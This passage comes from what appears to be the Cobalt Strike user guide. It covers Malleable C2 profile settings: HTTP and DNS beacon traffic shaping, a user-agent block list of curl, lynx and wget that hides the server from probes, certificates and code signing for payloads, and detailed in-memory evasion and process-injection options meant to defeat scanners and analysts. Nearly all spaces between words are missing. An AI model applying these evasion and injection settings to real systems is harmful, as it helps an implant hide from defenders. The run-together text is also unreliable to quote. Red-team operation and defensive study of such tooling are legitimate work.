syntax(“ ”).
|
||
uri l Appliestoprofile.http-get.uriandprofile.http-post.uri.
|
||
l ResolvedURILength:
|
||
o GetMaxLength=127
|
||
o PostMaxLength=64
|
||
l Optional,butwhenspecified,itcannotresolvetoablankvalue.
|
||
o NOTALLOWED:[/aaa|/bbb||]
|
||
l Muststartwith“/“.
|
||
l MustresolvetovalidHTTPURIsyntax.
|
||
parameter l Appliestoprofile.http-get.uriandprofile.http-post.uri.
|
||
l Upto10parametersinasingleHostProfileget/postdefinition.
|
||
l Supportsembeddeddynamicdatasyntaxinthenameandvalue.
|
||
l If/whenthenameresolvestoablankvalue,theparameterwillbe
|
||
dropped.
|
||
l Blankparametervaluesaresupported.
|
||
header l Appliestoprofile.http-get.uriandprofile.http-post.uri.
|
||
l Upto10headersinasingleHostProfileget/postdefinition.
|
||
l Supportsembeddeddynamicdatasyntaxinthenameandvalue.
|
||
l If/whenthenameresolvestoablankvalue,theheaderwillbe
|
||
dropped.
|
||
l If/whenthevalueresolvestoablankvalue,theheaderwillbe
|
||
dropped.
|
||
NOTE:
|
||
Theheaderandparameterfieldsaboveallowhostnamespecificconfigurationinaddition
|
||
totheheadersandparametersdescribedintheProfileLanguage/HeadersandParameters
|
||
sectionintheguide.
|
||
Restrictions
|
||
CobaltStrikeUserGuide www.fortra.com page:142
|
||
|
||
MalleableCommandandControl/HTTPServerConfiguration
|
||
l Upto8hostprofilesusedperlistener/beacon
|
||
l 1024bytelimitonspaceforallprofilesusedinabeacon(usesmallsimpledefinitionsif
|
||
possible)
|
||
l Maximum tokensinadynamicfield:32
|
||
Host Profile Linting:
|
||
l ThelintingprocessDOES NOTincludeHostProfilesettingsinthedefault/variantprofile
|
||
sampledataitgenerates.Theprocessdoesnotknowwhichhostswillbeassignedto
|
||
whichlistenersandwhichlistenerswillbeassignedtothedefaultorvariousprofile
|
||
variantstogeneratetheexamples.
|
||
l Thelintingprocessincludesseveralchecksforthedefinedhostprofiles.
|
||
l TheHostProfileget/postURI’smustresolvetouniqueURI’stoidentifyHTTPrequests
|
||
appropriately.ThelintingfeaturewilltestforpossibleURIcollisions.Lintingdoesnot
|
||
knowwhichprofilevariantsmightusespecifichostprofiles,sothelintingprocess
|
||
checksforduplicatesinalargerscope(allvariants)thanmaybeactuallyrequired.
|
||
l LintingrequirestheprocessresolveeverypotentialURI,andheader/parametername.
|
||
Complexdynamicdatacanresultinverylargesetsofresults,whichwillimpact
|
||
performanceandmemory.
|
||
HTTP Server Configuration
|
||
Thehttp-configblockhasinfluenceoverallHTTPresponsesservedbyCobaltStrike’sweb
|
||
server.Here,youmayspecifyadditionalHTTPheadersandtheHTTPheaderorder.
|
||
http-config {
|
||
set headers "Date, Server, Content-Length, Keep-Alive,
|
||
Connection, Content-Type";
|
||
header "Server" "Apache";
|
||
header "Keep-Alive" "timeout=5, max=100";
|
||
header "Connection" "Keep-Alive”;
|
||
set trust_x_forwarded_for "true";
|
||
set block_useragents "curl*,lynx*,wget*";
|
||
}
|
||
set headers-ThisoptionspecifiestheordertheseHTTPheadersaredeliveredinanHTTP
|
||
response.Anyheadersnotinthislistareaddedtotheend.
|
||
header-ThiskeywordaddsaheadervaluetoeachofCobaltStrike’sHTTPresponses.Ifthe
|
||
headervalueisalreadydefinedinaresponse,thisvalueisignored.
|
||
CobaltStrikeUserGuide www.fortra.com page:143
|
||
|
||
MalleableCommandandControl/Self-signedSSLCertificateswithSSLBeacon
|
||
set trust_x_forwarded_for-ThisoptiondecidesifCobaltStrikeusestheX-Forwarded-For
|
||
HTTPheadertodeterminetheremoteaddressofarequest.UsethisoptionifyourCobalt
|
||
StrikeserverisbehindanHTTPredirector.
|
||
block_useragentsandallow_useragents-Theseoptionsconfigurealistofuseragentsthat
|
||
areblockedorallowedwitha404response.Bydefault,requestsfromuseragentsthat
|
||
startwithcurl,lynx,orwgetareallblocked.Ifbotharespecified,block_useragentswill
|
||
takeprecedenceoverallow_useragents.Theoptionvaluesupportsastringofcomma
|
||
separatedvalues.Valuessupportsimplegenerics:
|
||
Example Description
|
||
notspecified Usethedefaultvalue(curl*,lynx*,wget*).Blockrequests
|
||
fromuseragentsstartingwithcurl,lynx,orwget.
|
||
blank(block_useragents) Nouseragentsareblocked.
|
||
blank(allowuser_agents) Alluseragentsareallowed.
|
||
something Block/Allowrequestswithuseragentequal'something'.
|
||
something* Block/Allowrequestswithuseragentstartingwith
|
||
'something'.
|
||
*something Block/Allowrequestswithuseragentendingwith
|
||
'something'.
|
||
*something* Block/Allowrequestswithuseragentcontaining
|
||
'something'.
|
||
Self-signed SSL Certificates with SSL Beacon
|
||
TheHTTPSBeaconusestheHTTPBeacon’sindicatorsinitscommunication.MalleableC2
|
||
profilesmayalsospecifyparametersfortheBeaconC2server’sself-signedSSLcertificate.This
|
||
isusefulifyouwanttoreplicateanactorwithuniqueindicatorsintheirSSLcertificate:
|
||
https-certificate {
|
||
set CN "bobsmalware.com";
|
||
set O "Bob’s Malware";
|
||
}
|
||
Thecertificateparametersunderyourprofile’scontrolare:
|
||
CobaltStrikeUserGuide www.fortra.com page:144
|
||
|
||
MalleableCommandandControl/ValidSSLCertificateswithSSLBeacon
|
||
Option Example Description
|
||
C US Country
|
||
CN beacon.cobaltstrike.com CommonName;Yourcallbackdomain
|
||
L Washington Locality
|
||
O Fortra,LLC OrganizationName
|
||
OU CertificateDepartment OrganizationalUnitName
|
||
ST DC StateorProvince
|
||
validity 365 Numberofdayscertificateisvalidfor
|
||
Valid SSL Certificates with SSL Beacon
|
||
YouhavetheoptiontouseaValidSSLcertificatewithBeacon.UseaMalleableC2profileto
|
||
specifyaJavaKeystorefileandapasswordforthekeystore.Thiskeystoremustcontainyour
|
||
certificate’sprivatekey,therootcertificate,anyintermediatecertificates,andthedomain
|
||
certificateprovidedbyyourSSLcertificatevendor.CobaltStrikeexpectstofindtheJava
|
||
KeystorefileinthesamefolderasyourMalleableC2profile.
|
||
https-certificate {
|
||
set keystore "domain.store";
|
||
set password "mypassword";
|
||
}
|
||
TheparameterstouseavalidSSLcertificateare:
|
||
Option Example Description
|
||
keystore domain.store JavaKeystorefilewithcertificateinformation
|
||
password mypassword ThepasswordtoyourJavaKeystore
|
||
HerearethestepstocreateaValidSSLcertificateforusewithCobaltStrike’sBeacon:
|
||
1. Usethekeytoolprogram tocreateaJavaKeystorefile.Thisprogram willask“Whatis
|
||
yourfirstandlastname?”Makesureyouanswerwiththefullyqualifieddomainnameto
|
||
yourBeaconserver.Also,makesureyoutakenoteofthekeystorepassword.Youwill
|
||
needitlater.
|
||
$ keytool -genkey -keyalg RSA -keysize 2048 -keystore
|
||
domain.store
|
||
CobaltStrikeUserGuide www.fortra.com page:145
|
||
|
||
MalleableCommandandControl/ProfileVariants
|
||
2. UsekeytooltogenerateaCertificateSigningRequest(CSR).Youwillsubmitthisfileto
|
||
yourSSLcertificatevendor.Theywillverifythatyouarewhoyouareandissuea
|
||
certificate.Somevendorsareeasierandcheapertodealwiththanothers.
|
||
$ keytool -certreq -keyalg RSA -file domain.csr -keystore
|
||
domain.store
|
||
3. ImporttheRootandanyIntermediateCertificatesthatyourSSLvendorprovides.
|
||
$ keytool -import -trustcacerts -alias FILE -file FILE.crt -
|
||
keystore domain.store
|
||
4. Finally,youmustinstallyourDomainCertificate.
|
||
$ keytool -import -trustcacerts -alias mykey -file domain.crt -
|
||
keystore domain.store
|
||
And,that’sit.YounowhaveaJavaKeystorefilethat’sreadytousewithCobaltStrike’sBeacon.
|
||
Profile Variants
|
||
MalleableC2profilefiles,bydefault,containoneprofile.It’spossibletopackvariationsofthe
|
||
currentprofilebyspecifyingvariantblocksforhttp-beacon,https-certificate,http-get,http-post
|
||
andhttp-stager.
|
||
Avariantblockisspecifiedas[block name] “variant name” { … }.Here’savarianthttp-getblock
|
||
named“MyVariant”:
|
||
http-get "My Variant" {
|
||
client {
|
||
parameter "bar" "blah";
|
||
Avariantblockcreatesacopyofthecurrentprofilewiththespecifiedvariantblocksreplacing
|
||
thedefaultblocksintheprofileitself.Eachuniquevariantnamecreatesanewvariantprofile.
|
||
Youmaypopulateaprofilewithasmanyvariantnamesasyoulike.
|
||
VariantsareselectablewhenconfiguringanHTTPorHTTPSBeaconlistener.Variantsallow
|
||
eachHTTPorHTTPSBeaconlistenertiedtoasingleteamservertohavenetworkIOCsthat
|
||
differfromeachother.
|
||
HTTP Beacons
|
||
Allowsyoutospecifyattributesforgeneralattributesforthehttp(s)beacons.
|
||
CobaltStrikeUserGuide www.fortra.com page:146
|
||
|
||
MalleableCommandandControl/CodeSigningCertificate
|
||
ThedefaultbeaconlibrarycansubsequentlybeoverriddenonUIDialogsandAggressor
|
||
Commandsthatgeneratebeaconsasneeded.
|
||
http-beacon {
|
||
set library "winhttp";
|
||
}
|
||
http-beacon "variant-x" {
|
||
set library "wininet";
|
||
}
|
||
Thesettingsare:
|
||
Option Default Value Description
|
||
library wininet Thelibraryattributeallowsusertospecifythedefault
|
||
libraryusedbythegeneratedbeaconsusedbythe
|
||
profile.
|
||
Thelibrarydefaultsto"wininet",whichistheonly
|
||
typeofbeaconpriortoversion4.9.Thelibraryvalue
|
||
canbe"wininet"or"winhttp".
|
||
Code Signing Certificate
|
||
Payloads -> Windows Stager PayloadandWindows Stageless Payloadgiveyoutheoptionto
|
||
signanexecutableorDLLfile.Tousethisoption,youmustspecifyaJavaKeystorefilewith
|
||
yourcodesigningcertificateandprivatekey.CobaltStrikeexpectstofindtheJavaKeystorefile
|
||
inthesamefolderasyourMalleableC2profile.
|
||
code-signer {
|
||
set keystore "keystore.jks";
|
||
set password "password";
|
||
set alias "server";
|
||
}
|
||
Thecodesigningcertificatesettingsare:
|
||
Option Example Description
|
||
alias server Thekeystore’saliasforthiscertificate
|
||
CobaltStrikeUserGuide www.fortra.com page:147
|
||
|
||
MalleableCommandandControl/DNSBeacons
|
||
Option Example Description
|
||
digest_ SHA256 Thedigestalgorithm
|
||
algorithm
|
||
keystore keystore.jks JavaKeystorefilewithcertificate
|
||
information
|
||
password mypassword ThepasswordtoyourJavaKeystore
|
||
timestamp false Timestampthefileusingathird-party
|
||
service
|
||
timestamp_url http://timestamp.digicert.com URLofthetimestampservice
|
||
DNS Beacons
|
||
YouhavetheoptiontoshapetheDNSBeacon/ListenernetworktrafficwithMalleableC2.
|
||
dns-beacon “optional-variant-name” {
|
||
# Options moved into 'dns-beacon' group in 4.3:
|
||
set dns_idle "1.2.3.4";
|
||
set dns_max_txt "199";
|
||
set dns_sleep "1";
|
||
set dns_ttl "5";
|
||
set maxdns "200";
|
||
set dns_stager_prepend "doc-stg-prepend";
|
||
set dns_stager_subhost "doc-stg-sh.";
|
||
# DNS subhost override options added in 4.3:
|
||
set beacon "doc.bc.";
|
||
set get_A "doc.1a.";
|
||
set get_AAAA "doc.4a.";
|
||
set get_TXT "doc.tx.";
|
||
set put_metadata "doc.md.";
|
||
set put_output "doc.po.";
|
||
set ns_response "zero";
|
||
}
|
||
Thesettingsare:
|
||
Option Default Value Changes
|
||
dns_idle 0.0.0.0 IPaddressusedtoindicatenotasksare
|
||
availabletoDNSBeacon;Maskforother
|
||
DNSC2values
|
||
CobaltStrikeUserGuide www.fortra.com page:148
|
||
|
||
MalleableCommandandControl/DNSBeacons
|
||
Option Default Value Changes
|
||
dns_max_txt 252 MaximumlengthofDNSTXTresponses
|
||
fortasks
|
||
dns_sleep 0 ForceasleeppriortoeachindividualDNS
|
||
request.(inmilliseconds)
|
||
dns_stager_prepend Prependtexttopayloadstagedeliveredto
|
||
DNSTXTrecordstager
|
||
dns_stager_subhost .stage.123456. SubdomainusedbyDNSTXTrecord
|
||
stager.
|
||
dns_ttl 1 TTLforDNSreplies
|
||
maxdns 255 Maximumlengthofhostnamewhen
|
||
uploadingdataoverDNS(0-255)
|
||
beacon DNSsubhostprefixusedforbeaconing
|
||
requests.(lowercasetext)
|
||
get_A cdn. DNSsubhostprefixusedforArecord
|
||
requests(lowercasetext)
|
||
get_AAAA www6. DNSsubhostprefixusedforAAAArecord
|
||
requests(lowercasetext)
|
||
get_TXT api. DNSsubhostprefixusedforTXTrecord
|
||
requests(lowercasetext)
|
||
put_metadata www. DNSsubhostprefixusedformetadata
|
||
requests(lowercasetext)
|
||
put_output post. DNSsubhostprefixusedforoutput
|
||
requests(lowercasetext)
|
||
ns_response drop HowtoprocessNSRecordrequests.
|
||
"drop"doesnotrespondtotherequest
|
||
(default),"idle"respondswithArecordfor
|
||
IPaddressfrom"dns_idle","zero"responds
|
||
withArecordfor0.0.0.0
|
||
Youcanuse"ns_response"whenaDNSserverisrespondingtoatargetwith"Serverfailure"
|
||
errors.ApublicDNSResolvermaybeinitiatingNSrecordrequeststhattheDNSServerinCobalt
|
||
StrikeTeamServerisdroppingbydefault.
|
||
{target} {DNS Resolver} Standard query 0x5e06 A
|
||
doc.bc.11111111.a.example.com
|
||
{DNS Resolver} {target} Standard query response 0x5e06 Server failure A
|
||
doc.bc.11111111.a.example.com
|
||
CobaltStrikeUserGuide www.fortra.com page:149
|
||
|
||
MalleableCommandandControl/ExercisingCautionwithMalleableC2
|
||
Exercising Caution with Malleable C2
|
||
MalleableC2givesyouanewlevelofcontroloveryournetworkandhostindicators.Withthis
|
||
poweralsocomesresponsibility.MalleableC2isanopportunitytomakealotofmistakestoo.
|
||
Hereareafewthingstothinkaboutwhenyoucustomizeyourprofiles:
|
||
l EachCobaltStrikeinstanceusesoneprofileatatime.Ifyouchangeaprofileorloada
|
||
newprofile,previouslydeployedBeaconscannotcommunicatewithyou.
|
||
l Alwaysstayawareofthestateofyourdataandwhataprotocolwillallowwhenyou
|
||
developadatatransform.Forexample,ifyoubase64encodemetadataandstoreitina
|
||
URIparameter—it’snotgoingtowork.Why?Somebase64characters(+,=,and/)have
|
||
specialmeaninginaURL.Thec2linttoolandProfileCompilerwillnotdetectthesetypes
|
||
ofproblems.
|
||
l Alwaystestyourprofiles,evenaftersmallchanges.IfBeaconcan’tcommunicatewith
|
||
you,it’sprobablyanissuewithyourprofile.Edititandtryagain.
|
||
l Trustthec2linttool.Thistoolgoesaboveandbeyondtheprofilecompiler.Thechecks
|
||
aregroundedinhowthistechnologyisimplemented.Ifac2lintcheckfails,itmeans
|
||
thereisarealproblem withyourprofile.
|
||
CobaltStrikeUserGuide www.fortra.com page:150
|
||
|
||
MalleablePE,ProcessInjection,andPostExploitation/Overview
|
||
Malleable PE, Process Injection,
|
||
and Post Exploitation
|
||
Overview
|
||
MalleableC2profilesaremorethancommunicationindicators.MalleableC2profilesalso
|
||
controlBeacon’sin-memorycharacteristics,determinehowBeacondoesprocessinjection,and
|
||
influenceCobaltStrike’spost-exploitationjobstoo.Thesectionsthatfollowdocumentthese
|
||
extensionstotheMalleableC2language.
|
||
PE and Memory Indicators
|
||
ThestageblockinMalleableC2profilescontrolshowBeaconisloadedintomemoryandedit
|
||
thecontentoftheBeaconDLL.
|
||
stage {
|
||
set userwx "false";
|
||
set compile_time "14 Jul 2009 8:14:00";
|
||
set image_size_x86 "512000";
|
||
set image_size_x64 "512000";
|
||
set obfuscate "true";
|
||
transform-x86 {
|
||
prepend "\x90\x90";
|
||
strrep "ReflectiveLoader" "DoLegitStuff";
|
||
}
|
||
transform-x64 {
|
||
# transform the x64 rDLL stage
|
||
}
|
||
stringw "I am not Beacon";
|
||
}
|
||
Thestage blockacceptscommandsthataddstringstothe.rdatasectionoftheBeaconDLL.
|
||
Thestring commandaddsazero-terminatedstring.Thestringw commandaddsawide(UTF-
|
||
16LEencoded)string.Thedata commandaddsyourstringas-is.
|
||
CobaltStrikeUserGuide www.fortra.com page:151
|
||
|
||
MalleablePE,ProcessInjection,andPostExploitation/PEandMemoryIndicators
|
||
Thetransform-x86 andtransform-x64 blockspadandtransformBeacon’sReflectiveDLL
|
||
stage.Theseblockssupportthreecommands:prepend,append,andstrrep.
|
||
Theprepend commandinsertsastringbeforeBeacon’sReflectiveDLL.Theappend command
|
||
addsastringaftertheBeaconReflectiveDLL.Makesurethatprependeddataisvalidcodefor
|
||
thestage’sarchitecture(x86,x64).Thec2lintprogramdoesnothaveacheckforthis.The
|
||
strrep commandreplacesastringwithinBeacon’sReflectiveDLL.
|
||
ThestageblockacceptsseveraloptionsthatcontroltheBeaconDLLcontentandprovidehints
|
||
tochangethebehaviorofBeacon’sReflectiveLoader:
|
||
Option Example Description
|
||
allocator HeapAlloc SethowBeacon'sReflectiveLoaderallocates
|
||
memoryfortheagent.Optionsare:HeapAlloc,
|
||
MapViewOfFile,andVirtualAlloc.
|
||
cleanup false AskBeacontoattempttofreememoryassociated
|
||
withtheReflectiveDLLpackagethatinitializedit.
|
||
data_store_size 16 SethowmanyentriescanbestoredinBeaconData
|
||
Store.
|
||
magic_mz_x86 MZRE Overridethefirstbytes(MZheaderincluded)of
|
||
Beacon'sReflectiveDLL.Validx86instructionsare
|
||
required.FollowinstructionsthatchangeCPUstate
|
||
withinstructionsthatundothechange.
|
||
magic_mz_x64 MZAR Sameasmagic_mz_x86;affectsx64DLL
|
||
magic_pe PE OverridethePEcharactermarkerusedbyBeacon's
|
||
ReflectiveLoaderwithanothervalue.
|
||
module_x861 xpsservices.dll Askthex86ReflectiveLoadertoloadthespecified
|
||
libraryandoverwriteitsspaceinsteadofallocating
|
||
memorywithVirtualAlloc.
|
||
module_x641 xpsservices.dll Sameasmodule_x86;affectsx64loader
|
||
obfuscate false ObfuscatetheReflectiveDLL’simporttable,
|
||
overwriteunusedheadercontent,andask
|
||
ReflectiveLoadertocopyBeacontonewmemory
|
||
withoutitsDLLheaders.
|
||
sleep_mask false ObfuscateBeaconandit'sheap,in-memory,priorto
|
||
sleeping.
|
||
smartinject false Useembeddedfunctionpointerhintstobootstrap
|
||
Beaconagentwithoutwalkingkernel32EAT
|
||
CobaltStrikeUserGuide www.fortra.com page:152
|
||
|
||
MalleablePE,ProcessInjection,andPostExploitation/PEandMemoryIndicators
|
||
Option Example Description
|
||
stomppe true AskReflectiveLoadertostompMZ,PE,ande_lfanew
|
||
valuesafteritloadsBeaconpayload
|
||
syscall_method None Setthesystemcallmethodtouseoninitialbeacon
|
||
execution.OptionsareNone,Direct,Indirect.See
|
||
sectionSystemCallsforadditionalinformation.
|
||
userwx false AskReflectiveLoadertouseoravoidRWX
|
||
permissionsforBeaconDLLinmemory
|
||
1.-Themodule_x86andmodule_x64settingnowsupportstheabilitytospecifythestarting
|
||
ordinalvaluetosearchforanexportedfunction.Theoptional0x##partisthestarting
|
||
ordinalvaluespecifiedasaninteger.IfalibraryissetandBeacondoesnotoverwriteitself
|
||
intothememoryspacethenitlikelythelibrarydoesnothaveanexportedfunctionwithan
|
||
ordinalvalueof1through15.Toresolvethisdetermineavalidordinalvalueandspecify
|
||
thisvalueusingtheoptionalsyntax,forexample:setmodule_x64"libtemp.dll+0x90"
|
||
Cloning PE Headers
|
||
ThestageblockhasseveraloptionsthatchangethecharacteristicsofyourBeaconReflective
|
||
DLLtolooklikesomethingelseinmemory.Thesearemeanttocreateindicatorsthatsupport
|
||
analysisexercisesandthreatemulationscenarios.
|
||
Option Example Description
|
||
checksum 0 TheCheckSumvalueinBeacon’sPEheader
|
||
compile_time 14July20098:14:00 ThebuildtimeinBeacon’sPEheader
|
||
entry_point 92145 TheEntryPointvalueinBeacon’sPEheader
|
||
image_size_x64 512000 SizeOfImagevalueinx64Beacon’sPEheader
|
||
image_size_x86 512000 SizeOfImagevalueinx86Beacon’sPEheader
|
||
name beacon.x64.dll TheExportednameoftheBeaconDLL
|
||
rich_header Meta-informationinsertedbythecompiler
|
||
CobaltStrike’sLinuxpackageincludesatool,peclone,toextractheadersfromaDLLand
|
||
presentthemasaready-to-usestageblock:
|
||
./peclone [/path/to/sample.dll]
|
||
In-memory Evasion and Obfuscation
|
||
CobaltStrikeUserGuide www.fortra.com page:153
|
||
|
||
MalleablePE,ProcessInjection,andPostExploitation/PEandMemoryIndicators
|
||
Usethestageblock’sprepend commandtodefeatanalysisthatscansthefirstfewbytesofa
|
||
memorysegmenttolookforsignsofaninjectedDLL.Iftool-specificstringsareusedtodetect
|
||
youragents,changethemwiththestrrep command.
|
||
Ifstrrepisn’tenough,setsleep_mask totrue.ThisdirectsBeacontoobfuscateitselfandit's
|
||
heapin-memorybeforeitgoestosleep.Aftersleeping,Beaconwillde-obfuscateitselfto
|
||
requestandprocesstasks.TheSMBandTCPBeaconswillobfuscatethemselveswhilewaiting
|
||
foranewconnectionorwaitingfordatafromtheirparentsession.
|
||
DecidehowmuchyouwanttolooklikeaDLLinmemory.Ifyouwanttoalloweasydetection,
|
||
setstomppe tofalse.IfyouwouldliketolightlyobfuscateyourBeaconDLLinmemory,set
|
||
stomppetotrue.Ifyou’dliketoupthechallenge,setobfuscate totrue.Thisoptionwilltake
|
||
manystepstoobfuscateyourBeaconstageandthefinalstateoftheDLLinmemory.
|
||
OnewaytofindmemoryinjectedDLLsistolookfortheMZandPEmagicbytesattheir
|
||
expectedlocationsrelativetoeachother.Thesevaluesarenotusuallyobfuscatedasthe
|
||
reflectiveloadingprocessdependsonthem.Theobfuscateoptiondoesnotaffectthesevalues.
|
||
Setmagic_pe totwolettersorbytesthatmarkthebeginningofthePEheader.Setmagic_mz_
|
||
x86 tochangethesemagicbytesinthex86BeaconDLL.Setmagic_mz_x64 forthex64
|
||
BeaconDLL.FollowinstructionsthatchangeCPUstatewithinstructionsthatundothechange.
|
||
Forexample,MZistheeasilyrecognizableheadersequence,butit'salsovalidx86andx64
|
||
instructions.Thefollow-onRE(x86)andAR (x64)arevalidx86andx64instructionsthatundo
|
||
theMZchanges.ThesehintswillchangethemagicvaluesinBeacon'sReflectiveDLLpackage
|
||
andmakethereflectiveloadingprocessusethenewvalues.
|
||
figure67-Disassemblyofdefaultmodule_mz_x86value
|
||
Setuserwx tofalsetoaskBeacon’sloadertoavoidRWXpermissions.Memorysegmentswith
|
||
thesepermissionswillattractextraattentionfromanalystsandsecurityproducts.
|
||
Bydefault,Beacon’sloaderallocatesmemorywithVirtualAlloc.Usetheallocator optionto
|
||
changethis.TheHeapAllocoptionallocatesheapmemoryforBeaconwithRWXpermissions.
|
||
TheMapViewOfFileallocatorallocatesmemoryforBeaconbycreatingananonymousmemory
|
||
mappedfileregioninthecurrentprocess.Modulestompingisanalternativetotheseoptions
|
||
andawaytohaveBeaconexecutefromcovetedimagememory.Setmodule_x86 toaDLLthat
|
||
CobaltStrikeUserGuide www.fortra.com page:154
|
||
|
||
MalleablePE,ProcessInjection,andPostExploitation/ProcessInjection
|
||
isabouttwiceaslargeastheBeaconpayloaditself.Beacon’sx86loaderwillloadthespecified
|
||
DLL,finditslocationinmemory,andoverwriteit.ThisisawaytosituateBeaconinmemorythat
|
||
Windowsassociateswithafileondisk.It’simportantthattheDLLyouchooseisnotneededby
|
||
theapplicationsyouintendtoresidein.Themodule_x64 optionisthesamestory,butitaffects
|
||
thex64Beacon.
|
||
Ifyou’reworriedabouttheBeaconstagethatinitializestheBeaconDLLinmemory,setcleanup
|
||
totrue.ThisoptionwillfreethememoryassociatedwiththeBeaconstagewhenit’snolonger
|
||
needed.
|
||
Process Injection
|
||
Theprocess-injectblockinMalleableC2profilesshapesinjectedcontentandcontrolsprocess
|
||
injectionbehaviorfortheBeaconpayload.ItalsocontrolsthebehaviorofBeaconObjectFiles
|
||
(BOF)executionwithinthecurrentbeacon.
|
||
process-inject {
|
||
# set how memory is allocated in a remote process for
|
||
injected content
|
||
set allocator "VirtualAllocEx";
|
||
# set how memory is allocated in the current process for BOF
|
||
content
|
||
set bof_allocator "VirtualAlloc";
|
||
set bof_reuse_memory "true";
|
||
# shape the memory characteristics for injected and BOF
|
||
content
|
||
set min_alloc "16384";
|
||
set startrwx "true";
|
||
set userwx "false";
|
||
# transform x86 injected content
|
||
transform-x86 {
|
||
prepend "\x90\x90";
|
||
}
|
||
# transform x64 injected content
|
||
transform-x64 {
|
||
append "\x90\x90";
|
||
}
|
||
# determine how to execute the injected code
|
||
execute {
|
||
CreateThread "ntdll.dll!RtlUserThreadStart";
|
||
SetThreadContext;
|
||
CobaltStrikeUserGuide www.fortra.com page:155
|
||
|
||
MalleablePE,ProcessInjection,andPostExploitation/ProcessInjection
|
||
RtlCreateUserThread;
|
||
}
|
||
}
|
||
Theprocess-injectblockacceptsseveraloptionsthatcontroltheprocessinjectionprocessin
|
||
Beacon:
|
||
Option Example Description
|
||
allocator VirtualAllocEx Thepreferredmethodtoallocatememoryinthe
|
||
remoteprocess.SpecifyVirtualAllocExor
|
||
NtMapViewOfSection.TheNtMapViewOfSection
|
||
optionisforsame-architectureinjectiononly.
|
||
VirtualAllocExisalwaysusedforcross-archmemory
|
||
allocations.
|
||
bof_allocator VirtualAlloc Thepreferredmethodtoallocatememoryinthe
|
||
currentprocesstoexecuteaBOF.Specify
|
||
VirtualAlloc,MapViewOfFile,orHeapAlloc.
|
||
bof_reuse_memory true ReusetheallocatedmemoryforsubsequentBOF
|
||
executionsotherwisereleasethememory.Memory
|
||
willbeclearedwhennotinuse.Iftheavailable
|
||
amountofmemoryisnotlargeenoughitwillbe
|
||
releasedandallocatedwiththelargersize.
|
||
min_alloc 4096 Minimumamountofmemorytorequestforinjected
|
||
orBOFcontent.
|
||
startrwx false UseRWXasinitialpermissionsforinjectedorBOF
|
||
content.AlternativeisRW.WhenBOFmemoryisnot
|
||
inusethepermissionswillbesetbasedonthis
|
||
setting.
|
||
userwx false UseRWXasfinalpermissionsforinjectedorBOF
|
||
content.AlternativeisRX.
|
||
Thetransform-x86 andtransform-x64 blockspadcontentinjectedbyBeacon.Theseblocks
|
||
supporttwocommands:prependandappend.
|
||
Theprepend commandinsertsastringbeforetheinjectedcontent.Theappend command
|
||
addsastringaftertheinjectedcontent.Makesurethatprependeddataisvalidcodeforthe
|
||
injectedcontent’sarchitecture(x86,x64).Thec2lintprogramdoesnothaveacheckforthis.
|
||
Theexecute blockcontrolsthemethodsBeaconwillusewhenitneedstoinjectcodeintoa
|
||
process.Beaconexamineseachoptionintheexecuteblock,determinesiftheoptionisusable
|
||
forthecurrentcontext,triesthemethodwhenitisusable,andmovesontothenextoptionif
|
||
codeexecutiondidnothappen.Theexecuteoptionsinclude:
|
||
CobaltStrikeUserGuide www.fortra.com page:156
|
||
|
||
MalleablePE,ProcessInjection,andPostExploitation/ControllingProcessInjection
|
||
Option x86->x64 x64->x86 Notes
|
||
CreateThread Currentprocessonly
|
||
CreateRemoteThread Yes Nocross-session
|
||
NtQueueApcThread
|
||
NtQueueApcThread-s Thisisthe“EarlyBird”
|
||
injectiontechnique.
|
||
Suspendedprocesses(e.g.,
|
||
post-exjobs)only.
|
||
RtlCreateUserThread Yes Yes RiskyonXP-eratargets;uses
|
||
RWXshellcodeforx86->x64
|
||
injection.
|
||
SetThreadContext Yes Suspendedprocesses(e.g.,
|
||
post-exjobs)only.
|
||
TheCreateThread andCreateRemoteThread optionshavevariantsthatspawnasuspended
|
||
threadwiththeaddressofanotherfunction,updatethesuspendedthreadtoexecutethe
|
||
injectedcode,andresumethatthread.Use[function]“module!function+0x##”tospecifythe
|
||
startaddresstospoof.Forremoteprocesses,ntdllandkernel32aretheonlyrecommended
|
||
modulestopullfrom.Theoptional0x##partisanoffsetaddedtothestartaddress.These
|
||
variantsworkx86->x86andx64->x64only.
|
||
Theexecuteoptionsyouchoosemustcoveravarietyofcornercases.Thesecornercases
|
||
includeselfinjection,injectionintosuspendedtemporaryprocesses,cross-sessionremote
|
||
processinjection,x86->x64injection,x64->x86injection,andinjectionwithorwithoutpassing
|
||
anargument.Thec2linttoolwillwarnyouaboutcontextsthatyourexecuteblockdoesnot
|
||
cover.
|
||
Controlling Process Injection
|
||
CobaltStrike4.5addedsupporttoallowuserstodefinetheirownprocessinjectiontechnique
|
||
insteadofusingthebuilt-intechniques.ThisisdonethroughthePROCESS_INJECT_
|
||
SPAWN andPROCESS_INJECT_EXPLICIT hookfunctions.CobaltStrikewillcalloneof
|
||
thesehookfunctionswhenexecutingpostexploitationcommands.Seethesectiononthehook
|
||
foratableofsupportedcommands.
|
||
Thetwohookswillcovermostofthepostexploitationcommands.However,therearesome
|
||
exceptionswhichwillnotusethesehooksandwillcontinuetousethebuilt-intechnique.
|
||
Beacon Command Aggressor Script function
|
||
&bdllspawn
|
||
CobaltStrikeUserGuide www.fortra.com page:157
|
||
|
||
MalleablePE,ProcessInjection,andPostExploitation/ControllingProcessInjection
|
||
Beacon Command Aggressor Script function
|
||
shell &bshell
|
||
execute-assembly &bexecute_assembly
|
||
Toimplementyourowninjectiontechnique,youwillberequiredtosupplyaBeaconObjectFile
|
||
(BOF)containingyourexecutablecodeforx86and/orx64architecturesandanAggressor
|
||
Scriptfilecontainingthehookfunction.SeetheProcessInjectionHookExamplesinthe
|
||
CommunityKit.
|
||
Sinceyouareimplementingyourowninjectiontechnique,theprocess-injectsettingsinyour
|
||
MalleableC2profilewillnotbeusedunlessyourBOFcallstheBeaconAPIfunction
|
||
BeaconInjectProcessorBeaconInjectTemporaryProcess.Thesefunctionsimplementthe
|
||
defaultinjectionandmostlikelywillnotbeusedunlessitistoimplementafallbacktothe
|
||
defaulttechnique.
|
||
Process Injection Spawn
|
||
ThePROCESS_INJECT_SPAWNhookisusedtodefinethefork&runprocessinjection
|
||
technique.Thefollowingbeaconcommands,aggressorscriptfunctions,andUIinterfaceslisted
|
||
inthetablebelowwillcallthehookandtheusercanimplementtheirowntechniqueorusethe
|
||
built-intechnique.
|
||
Notethefollowing:
|
||
l
|
||
Theelevate,runasadmin,&belevate,&brunasadmin and[beacon] -> Access ->
|
||
Elevate commandswillonlyusethePROCESS_INJECT_SPAWNhookwhenthe
|
||
